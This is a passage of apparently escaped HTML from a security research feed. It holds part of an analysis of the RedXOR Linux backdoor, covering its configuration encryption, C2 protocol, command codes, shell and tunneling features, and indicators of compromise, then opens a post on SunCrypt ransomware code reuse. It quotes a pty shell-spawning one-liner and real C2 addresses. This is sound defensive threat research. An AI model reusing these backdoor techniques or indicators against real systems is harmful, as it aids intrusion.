&lt;figcaption&gt;Figure 8: Client authentication code for the adore-ng rootkit&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Configuration&lt;span class="hx:absolute hx:-mt-20" id="configuration"&gt;&lt;/span&gt;
&lt;a href="#configuration" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware stores the configuration encrypted within the binary. In addition
to the Command and control (C2) IP address and port it can also be configured
to use a proxy. The configuration includes a password, as can be seen in Figure
9. This password is used by the malware to authenticate to the C2 server.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig9.png" title="Figure 9: Configuration options for the malware" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 9: Configuration options for the malware&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The configuration values are decrypted by the &lt;code&gt;doXor&lt;/code&gt; function. A pseudo-code
representation of the function is shown in Figure 10. The decryption logic is a
simple XOR against a byte key. The byte key is incremented by a constant for
each item in the buffer. The only configuration value that is not encrypted is
the server port. The port value is used to derive the key and the adder. The
key is derived from bit shifting the port value eight steps to the right. The
constant uses the port value.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig10.png" title="Figure 10: Decryption logic of the configuration data. The data is XORed against a key byte that is incremented by a constant for each entry in the buffer" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 10: Decryption logic of the configuration data. The data is XORed against a key byte that is incremented by a constant for each entry in the buffer&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Communication with the C2&lt;span class="hx:absolute hx:-mt-20" id="communication-with-the-c2"&gt;&lt;/span&gt;
&lt;a href="#communication-with-the-c2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware communicates with the C2 server over a TCP socket. The traffic is
made to look like HTTP traffic. Figure 11 shows a pseudo-code representation of
the function used by the malware to prepare data that is to be sent to the C2
server. First, it fills the buffer with null bytes. The request body is XORed
against a key. The malware uses the buffer length as the key. This value is
also passed into the function as the &amp;ldquo;total_length&amp;rdquo; argument.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig11.png" title="Figure 11: Function for preparing data to be sent to the C2 server" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 11: Function for preparing data to be sent to the C2 server&lt;/figcaption&gt;
&lt;/figure&gt;
The same logic is used to decrypt the response body from the C2 server. From
the response, the malware extracts &amp;ldquo;JSESSIONID&amp;rdquo;, &amp;ldquo;Content-Length&amp;rdquo;,
&amp;ldquo;Total-Length&amp;rdquo; and the response body. The data is added to a struct with the
following layout:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;0x0 JSESSIONID as int
0x8 Content-Length as long
0x10 Total-Length as long
0x18 Response body&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The content length is the length of the response body but also used as the key.
The total length value is used as a constant which is added to the key in each
iteration. The JSESSIONID value holds the command ID for the job the C2 wants
the malware to perform.&lt;/p&gt;
&lt;h3&gt;Commands&lt;span class="hx:absolute hx:-mt-20" id="commands"&gt;&lt;/span&gt;
&lt;a href="#commands" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The C2 server tells the malware to execute different commands via a command
code that is returned in the &amp;ldquo;JSESSIONID&amp;rdquo; cookie. The codes are encoded as
decimal integers. A full list of commands supported by the analyzed malware
sample are shown in the table below. They can be grouped into command types.
Commands in the 2000 range provide &amp;ldquo;filesystem&amp;rdquo; interaction, 3000 handle
&amp;ldquo;shell&amp;rdquo; commands, and 4000 handle network tunneling.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Table 1: List of commands supported by the malware&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Code&lt;/th&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;0000&lt;/td&gt;
&lt;td&gt;System information&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0008&lt;/td&gt;
&lt;td&gt;Update&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0009&lt;/td&gt;
&lt;td&gt;Uninstall&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1000&lt;/td&gt;
&lt;td&gt;Ping&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1010&lt;/td&gt;
&lt;td&gt;Install LKM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2049&lt;/td&gt;
&lt;td&gt;List folder&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2054&lt;/td&gt;
&lt;td&gt;Upload file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2055&lt;/td&gt;
&lt;td&gt;Open file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2056&lt;/td&gt;
&lt;td&gt;Execute with system&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2058&lt;/td&gt;
&lt;td&gt;Remove file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2060&lt;/td&gt;
&lt;td&gt;Remove folder&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2061&lt;/td&gt;
&lt;td&gt;Rename&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2062&lt;/td&gt;
&lt;td&gt;Create new folder&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2066&lt;/td&gt;
&lt;td&gt;Write content to file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3000&lt;/td&gt;
&lt;td&gt;Start shell&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3058&lt;/td&gt;
&lt;td&gt;Exec shell command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3999&lt;/td&gt;
&lt;td&gt;Close tty&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4001&lt;/td&gt;
&lt;td&gt;Portmap (Proxy)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4002&lt;/td&gt;
&lt;td&gt;Kill portmap&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;System Information&lt;span class="hx:absolute hx:-mt-20" id="system-information"&gt;&lt;/span&gt;
&lt;a href="#system-information" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;When the malware first contacts the C2 server it sends a password encoded in
the request body. The C2 server responds with the command code 0 to collect
system information. The data collected about the system by the malware is
listed in the table below. The data is serialized into a URL query-like string,
encrypted and then sent as the request body.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Table 2: Data collected by the malware and sent back to the C2 server&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;URL key&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Comment&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;hostip&lt;/td&gt;
&lt;td&gt;IP&lt;/td&gt;
&lt;td&gt;Hardcoded to 127.0.0.1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;softtype&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Hardcoded to &amp;ldquo;Linux&amp;rdquo;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;pscaddr&lt;/td&gt;
&lt;td&gt;MAC address&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hostname&lt;/td&gt;
&lt;td&gt;Machine name&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hosttar&lt;/td&gt;
&lt;td&gt;Username&lt;/td&gt;
&lt;td&gt;Possibly &amp;ldquo;host target&amp;rdquo;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hostos&lt;/td&gt;
&lt;td&gt;Distribution&lt;/td&gt;
&lt;td&gt;Extracted from /etc/issue or /etc/redhat-release&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hostcpu&lt;/td&gt;
&lt;td&gt;Clock speed&lt;/td&gt;
&lt;td&gt;/proc/cpuinfo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hostmem&lt;/td&gt;
&lt;td&gt;Amount of memory&lt;/td&gt;
&lt;td&gt;/proc/meminfo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hostpack&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Hardcoded to &amp;ldquo;Linux&amp;rdquo;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;lkmtag&lt;/td&gt;
&lt;td&gt;Is rootkit enabled&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;kernel&lt;/td&gt;
&lt;td&gt;Kernel version&lt;/td&gt;
&lt;td&gt;Extracted from uname&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Figure 12 shows the communication between RedXOR and the C2. The malware sends
the password &lt;code&gt;pd=admin&lt;/code&gt; and C2 responds with &lt;code&gt;all right&lt;/code&gt; (&lt;code&gt;JSESSIONID=0000&lt;/code&gt;).
Next, the malware sends the system information and the C2 replies with the ping
command (&lt;code&gt;JSESSIONID=1000&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig12.png" title="Figure 12: RedXOR communication with C2" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 12: RedXOR communication with C2&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Update Functionality&lt;span class="hx:absolute hx:-mt-20" id="update-functionality"&gt;&lt;/span&gt;
&lt;a href="#update-functionality" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware can be updated by the threat actor. This is performed by sending
command code 8 to the malware. When the malware receives this code the
following actions are taken:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The malware opens the mutex file for writing.&lt;/li&gt;
&lt;li&gt;It sends a request with the command code 8 and an empty request body to the
C2 server.&lt;/li&gt;
&lt;li&gt;The response body from the server is written to the mutex file. The response
body is not encrypted.&lt;/li&gt;
&lt;li&gt;The lock is released on the mutex file.&lt;/li&gt;
&lt;li&gt;The malware executes &amp;ldquo;chmod&amp;rdquo; to set the execution flag on the file via the
libc system function.&lt;/li&gt;
&lt;li&gt;The malware sleeps and tries to obtain the lock on the file again when it
wakes up. If it fails, it assumes the update was successful, closes the
connection to the C2 server and exits.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Shell Functionality&lt;span class="hx:absolute hx:-mt-20" id="shell-functionality"&gt;&lt;/span&gt;
&lt;a href="#shell-functionality" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware has the ability to provide its operator with a &lt;code&gt;tty&lt;/code&gt; shell. If a
shell is requested via the command code 3000, the malware creates a new thread
executing &lt;code&gt;/bin/sh&lt;/code&gt;. In the new spawned shell, the malware executes
&lt;code&gt;python -c &amp;quot;import pty;pty.spawn('/bin/sh')&amp;quot;&lt;/code&gt; to get a pseudo-terminal (pty)
interface. Any shell commands sent to the malware with the command code of 3058
are executed in the pty and the response is returned to the operator.&lt;/p&gt;
&lt;h3&gt;Network Tunneling&lt;span class="hx:absolute hx:-mt-20" id="network-tunneling"&gt;&lt;/span&gt;
&lt;a href="#network-tunneling" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Network tunneling is enabled by sending the command code 4001 to the malware.
As part of the request, a &amp;ldquo;configuration&amp;rdquo; is sent as part of the response body.
The configuration consists of three items separated by a &amp;ldquo;#&amp;rdquo; character. The
items are: a port to bind to, the IP to connect to, and a port to connect to.
The malware uses a modified version of the open-source project Rinetd for the
tunneling logic. Rinetd is designed to use a configuration file stored on the
machine. To get around this, the malware author has modified the function that
parses the configuration in order to directly take the required values normally
found in the configuration file.&lt;/p&gt;
&lt;h2&gt;Detection &amp;amp; Response&lt;span class="hx:absolute hx:-mt-20" id="detection--response"&gt;&lt;/span&gt;
&lt;a href="#detection--response" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Detect if a Machine in Your Network Has Been Compromised&lt;span class="hx:absolute hx:-mt-20" id="detect-if-a-machine-in-your-network-has-been-compromised"&gt;&lt;/span&gt;
&lt;a href="#detect-if-a-machine-in-your-network-has-been-compromised" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Use a Cloud Workload Protection Platform like
&lt;a href="https://intezer.com/intezer-protect"target="_blank" rel="noopener"&gt;Intezer Protect&lt;/a&gt; to gain full runtime
visibility over the code in your Linux-based systems and get alerted on any
malicious or unauthorized code or commands.
&lt;a href="https://protect.intezer.com/signup"target="_blank" rel="noopener"&gt;Try our free community edition&lt;/a&gt; Figure 13
emphasizes an Intezer Protect alert on a compromised machine. The alert
provides additional context about the malicious code including threat
classification (RedXOR), binary’s path on the disk, process tree, command, and
hash.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig13.png" title="Figure 13: Intezer Protect alerts on RedXOR" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 13: Intezer Protect alerts on RedXOR&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We also recommend using the IOCs section below to ensure that the RedXOR
process and the files it creates do not exist on your system.&lt;/p&gt;
&lt;p&gt;Intezer Protect defends all types of compute resources—including VMs,
containers and Kubernetes—against the latest Linux threats in runtime.
&lt;a href="https://protect.intezer.com/signup"target="_blank" rel="noopener"&gt;Try our free community edition&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Response&lt;span class="hx:absolute hx:-mt-20" id="response"&gt;&lt;/span&gt;
&lt;a href="#response" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;If you are a victim of this operation, take the following steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Kill the process and delete all files related to the malware.&lt;/li&gt;
&lt;li&gt;Make sure your machine is clean and running only trusted code using a Cloud
Workload Protection Platform like Intezer Protect.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Wrap Up&lt;span class="hx:absolute hx:-mt-20" id="wrap-up"&gt;&lt;/span&gt;
&lt;a href="#wrap-up" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Linux systems are under constant attack given that Linux runs on most of the
public cloud workload. A
&lt;a href="https://secure2.sophos.com/en-us/content/state-of-cloud-security.aspx"target="_blank" rel="noopener"&gt;survey conducted by Sophos&lt;/a&gt;
found that 70% of organizations using the public cloud to host data or
workloads experienced a security incident in the past year. Along with botnets
and cryptominers, the Linux threat landscape is also home to sophisticated
threats like RedXOR developed by
&lt;a href="https://intezer.com/blog/malware-analysis/looking-back-on-the-last-decade-of-linux-apt-attacks/"target="_blank" rel="noopener"&gt;nation-state actors&lt;/a&gt;.
RedXOR samples are indexed in Intezer Analyze so that you can detect any
suspicious file that shares code with this malware.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig14.png" title="Figure 14: RedXOR sample in Intezer Analyze" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 14: RedXOR sample in Intezer Analyze&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Files&lt;span class="hx:absolute hx:-mt-20" id="files"&gt;&lt;/span&gt;
&lt;a href="#files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559f
0423258b94e8a9af58ad63ea493818618de2d8c60cf75ec7980edcaa34dcc919&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Network&lt;span class="hx:absolute hx:-mt-20" id="network"&gt;&lt;/span&gt;
&lt;a href="#network" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;update[.]cloudjscdn[.]com
158[.]247[.]208[.]230
34[.]92[.]228[].216&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Process name&lt;span class="hx:absolute hx:-mt-20" id="process-name"&gt;&lt;/span&gt;
&lt;a href="#process-name" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;po1kitd-update-k&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;File and directories created on disk&lt;span class="hx:absolute hx:-mt-20" id="file-and-directories-created-on-disk"&gt;&lt;/span&gt;
&lt;a href="#file-and-directories-created-on-disk" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;.po1kitd-update-k
.po1kitd.thumb
.po1kitd-2a4D53
.po1kitd-k3i86dfv
.po1kitd-nrkSh7d6
.po1kitd-2sAq14
.2sAq14
.2a4D53
po1kitd.ko
po1kitd-update.desktop
S99po1kitd-update.sh&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>When Viruses Mutate: Did SunCrypt Ransomware Evolve from QNAPCrypt?</title><link>https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/</link><pubDate>Tue, 02 Mar 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/03/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt/</guid><description>
&lt;p&gt;&lt;em&gt;Dov Lerner from Cybersixgill contributed to this report&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;Intro&lt;span class="hx:absolute hx:-mt-20" id="intro"&gt;&lt;/span&gt;
&lt;a href="#intro" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Programmers frequently reuse code, as recycling something that is already
written and functional is much more efficient than writing from scratch.
Malware authors are no different; functions and modules from one malware can be
reused in the next. Because of this, code reuse analysis can connect different
malware to the same author.&lt;/p&gt;
&lt;p&gt;When performing code reuse analysis, it is important to ensure that the code is
unique to the specific developer and not common code that, for example, is part
of an open-source library since open-source code can be used by many and cannot
be tied to a specific author. If this is handled correctly, code reuse is a
very powerful method for attributing malware to a specific malware author.&lt;/p&gt;
&lt;p&gt;There is a constant churn of new actors and malware families. However,
sometimes a seemingly new threat actor is just a &amp;ldquo;rebranding&amp;rdquo; or a new group
formed by known actors. For example, in May 2019, the GandCrab group announced
that they were retiring from their ransomware activity. Not long after,
&lt;a href="https://www.secureworks.com/blog/revil-the-gandcrab-connection"target="_blank" rel="noopener"&gt;researchers&lt;/a&gt;
connected a new ransomware called
&lt;a href="https://analyze.intezer.com/families/098aa9b8-08e5-4b20-a83f-5e94e57f8fd7"target="_blank" rel="noopener"&gt;REvil&lt;/a&gt;
(also known as Sodinokibi) to the then defunct GandCrab ransomware. REvil
shared unique code similarities with GandCrab. This suggested that when
GandCrab was closing down, the malware authors switched to develop a new
ransomware using some of the code from GandCrab in a new collaboration with
other threat actors.&lt;/p&gt;
&lt;p&gt;This report uses both dark web research and malware analysis to investigate the
connection between the affiliate ransomware service known as SunCrypt and the
&lt;a href="../../../2019/07/seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers"&gt;QNAPCrypt&lt;/a&gt;
ransomware, the latter of which was used against QNAP and Synology devices back
in 2019. While the two ransomware are operated by distinct different threat
actors on the dark web, there are strong technical connections in code reuse
and techniques, linking the two ransomware to the same author. Just because a
malware is a derivative of another malware does not mean it will be deployed in
exactly the same way. A new operator may use different targets, tactics,
techniques and procedures (TTPs), which can include new evasion techniques.
Defenders must remain vigilant.&lt;/p&gt;
&lt;h2&gt;Technical Connection&lt;span class="hx:absolute hx:-mt-20" id="technical-connection"&gt;&lt;/span&gt;
&lt;a href="#technical-connection" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;SunCrypt is a Ransomware as a Service (RaaS) that uses a closed affiliate
program on the dark web. The history of this RaaS can be traced back to circa
October 2019. In October 2019, a new ransomware was found in-the-wild
(&lt;a href="https://analyze.intezer.com/files/98b8924d3f49ed0279723d3311bbdafcc918f240390151ea65493e48d2803393"target="_blank" rel="noopener"&gt;5657abdb9d99cd5aec433099f8d6f53d&lt;/a&gt;).
The new ransomware was written in Go and targeted Windows machines. This
version of SunCrypt was not reported in many attacks and it wasn&amp;rsquo;t until
&lt;a href="https://id-ransomware.blogspot.com/2020/08/suncrypt-ransomware.html"target="_blank" rel="noopener"&gt;mid-2020&lt;/a&gt;
when a new version of the ransomware written in C/C++ was discovered, that
attacks started to increase. It is an interesting shift of retooling from Go to
C/C++ when
&lt;a href="https://twitter.com/VK_Intel/status/1281677718376120328"target="_blank" rel="noopener"&gt;other groups&lt;/a&gt; are
instead retooling from C/C++ to Go.&lt;/p&gt;
&lt;p&gt;While the RaaS didn&amp;rsquo;t appear until October 2019, these ransomware share
connections with another ransomware, called
&lt;a href="../../../2019/07/seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers"&gt;QNAPCrypt&lt;/a&gt;
(also known as
&lt;a href="https://www.anomali.com/blog/the-ech0raix-ransomware"target="_blank" rel="noopener"&gt;eCh0raix&lt;/a&gt;), that was
used to target Network Attached Storage (NAS) devices back in July 2019. Both
families share identical code logic for the file encryption, which we can
conclude with high certainty has been compiled from the same source code.&lt;/p&gt;
&lt;h3&gt;SunCrypt 2020 and SunCrypt 2019&lt;span class="hx:absolute hx:-mt-20" id="suncrypt-2020-and-suncrypt-2019"&gt;&lt;/span&gt;
&lt;a href="#suncrypt-2020-and-suncrypt-2019" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The SunCrypt variant that was released in 2020 is written in C. Due to this, it
does not have any shared code with the earlier version from 2019. The
functionality of SunCrypt has been
